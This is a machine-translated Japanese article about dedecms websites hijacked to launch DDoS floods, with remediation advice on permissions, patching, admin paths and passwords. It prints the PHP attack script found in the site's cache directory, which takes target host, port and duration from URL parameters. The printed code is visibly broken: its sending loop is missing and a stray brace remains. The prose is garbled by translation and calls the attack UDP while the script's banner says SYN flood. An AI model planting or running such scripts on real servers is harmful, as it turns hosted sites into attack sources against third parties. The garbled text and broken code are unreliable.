dedecms が DDOS 馬乗りの脆弱性を解決する方法

dedecms は DDOS マウントの脆弱性をどのように解決しますか?

Dedecms は中国でよく知られた PHP オープン ソース システムであり、多くの Web マスターが Web サイトを構築する際に最初に選択する CMS システムでもあります。多くのハッカーがこのプログラムに注目し、次々と dedecms の脆弱性を研究し、その結果、かなりの数の dedecms Web サイトが停止されました。コンピュータ室から警告を受けた人もおり、深刻なコンピュータ室は強制的に閉鎖され、巨額の損失が発生した。今日は、この問題をさらに詳しく分析し、解決策を見つけます。

推奨研究: 梦Weavercms

引っ掛け馬の特徴:

自分の Web サイトのホームページを開いて、ソース コードを表示すると見つかります。あなたの Web サイトには、多数の黒いリンク コードが追加されています。黒いリンク コードは、ウェブマスターにとって最もシンプルで見やすく、フレンドリー リンクのコードにすぎません。

もう 1 つの特徴は、Web サイトを開くと、Web サイトにマルウェアのリスクがあるというメッセージが 360 セキュリティによって表示されることです。このタイプのマルウェア コードは、通常、フレーム コード、JS コード、またはイメージ コードです。もう1つの特徴は、Webサイトが突然開かなくなったり、開くのが遅くなったりすることです。トラフィックを確認すると、大量のトラフィックが消費されていることがわかります。これは、UDPとも呼ばれるトラフィックを送信していることを意味しますトラフィックパケット攻撃。上記はハッキングされる dedecms の一般的な特徴ですが、Web サイトがハッキングされる場合の実際的な解決策と予防策について説明します。

まず、Web サイト プログラムのコードをローカル コンピューターにダウンロードし、sinesafe トロイの木馬駆除ツールを使用してそれを確認すると、data/cache/ ディレクトリに多数のスクリプト トロイの木馬が存在することがわかります。スクリプトを実行すると、いくつかの未知の PHP コードが見つかりました。そのコードを sinesafe トロイの木馬ツールに入れて詳細な分析を実施し、トロイの木馬の特徴を発見しました。コードは次のとおりです:

コードは次のとおりです:

<?php
set_time_limit(984918);
$host = $_GET[&#39;host&#39;];
$port = $_GET[&#39;port&#39;];
$exec_time = $_GET[&#39;time&#39;];
$Sendlen = 65535;
$packets = 0;
}
echo "================================================
";
echo " <font color=blue>www.phpddos.com
";
echo " SYN Flood 模块
";
echo " 作者：ybhacker
";
echo " 警告：本程序带有攻击性,仅供安全研究与教学之用,风险自负!</font>
";
echo "================================================
";
echo " 攻击包总数：<font color=Red><span class=\"text\">".$packets." 个数据包</span>
</font>";
echo " 攻击总流量：<font color=Red><span class=\"text\">".round(($packets*65*8)/(1024*1024),2)." Mbps</span>
</font>";
echo " 攻击总字节：<font color=Red><span class=\"text\">".time(&#39;h:i:s&#39;)." 字节</span>
</font>";
echo "Packet complete at ".time(&#39;h:i:s&#39;)." with $packets (" .round(($packets*65*8)/(1024*1024),2). " Mbps) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
?>

インターネットでこれが UDP トラフィック攻撃用の php スクリプトであることを発見しました。このトロイの木馬は、Web サイトのスクリプトの許可を得て実行することで、DDoS トラフィック攻撃の効果を得ることができます。サーバーのアクセス許可は必要ありません。そのとき初めて、コンピューター室が私の Web サイトを常にアウトソーシングしていると言った理由を理解しました。私の Web サイトを含め、このスクリプトを実行している Web サイトは開くのが遅いです。問題が見つかったら、すぐに解決する必要があります。[トロイの木馬コードのクリア] をクリックして、すべてを一度にクリアします。 Data/cache/ ディレクトリには見慣れないファイル名はありません。最後に、この「頑固な病気」を治すために、いくつかの解決策と予防策をまとめました。

1. dedecms ディレクトリのセキュリティ設定: data/cache/templets アップロード ディレクトリの設定は読み取りおよび書き込み可能ですが、そうではありません。実行可能。インクルード、メンバー、および読み取り可能、実行可能、および書き込み不可のアクセス許可を設定します。dedecms はストアド プロシージャをどこにも使用しないため、ストアド プロシージャまたはファイル操作を実行するための FILE、EXECUTE、およびその他のアクセス許可を無効にすることができます。

2. ウェブサイトプログラムのセキュリティ：これも最も基本的な予防策ですが、仮想空間の場合、ウェブサイトプログラムの安全性を確保するために、ウェブサイトのセキュリティメンテナンスを行う専門家を見つけることをお勧めします。安全なウェブサイトは安全で安定した顧客をもたらすことができます。

3. プログラムの更新: dedecms のバックグラウンドを開き、更新されたパッチがあるかどうかを確認します。そうであれば、更新して、時間内にパッチを適用してください。バージョンが非常に古い場合は、新しいバージョンを再インストールすることをお勧めします。新しいバージョンは比較的安全であり、多くの点で古いバージョンとは異なります。

4. バックエンド管理ディレクトリ: dedecms バックエンド管理ディレクトリは、通常、デフォルトで dedecms になります。多くの Web マスターは、このバックエンド アドレスをまったく気にしません。管理ディレクトリのアドレスがデフォルトである場合、私には非常に責任を持ってお伝えします。ディレクトリ名は数字と文字を組み合わせた名前に変更することをお勧めします。

5.FTP Web サイト管理パスワード: 多くのハッカーが総当たり攻撃を使用してパスワードを解読し、特殊な記号や文字を使用してパスワードをできるだけ複雑にするため、FTP パスワードと Web サイト管理パスワードを頻繁に変更することをお勧めします。

以上がdedecms が DDOS 馬乗りの脆弱性を解決する方法の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。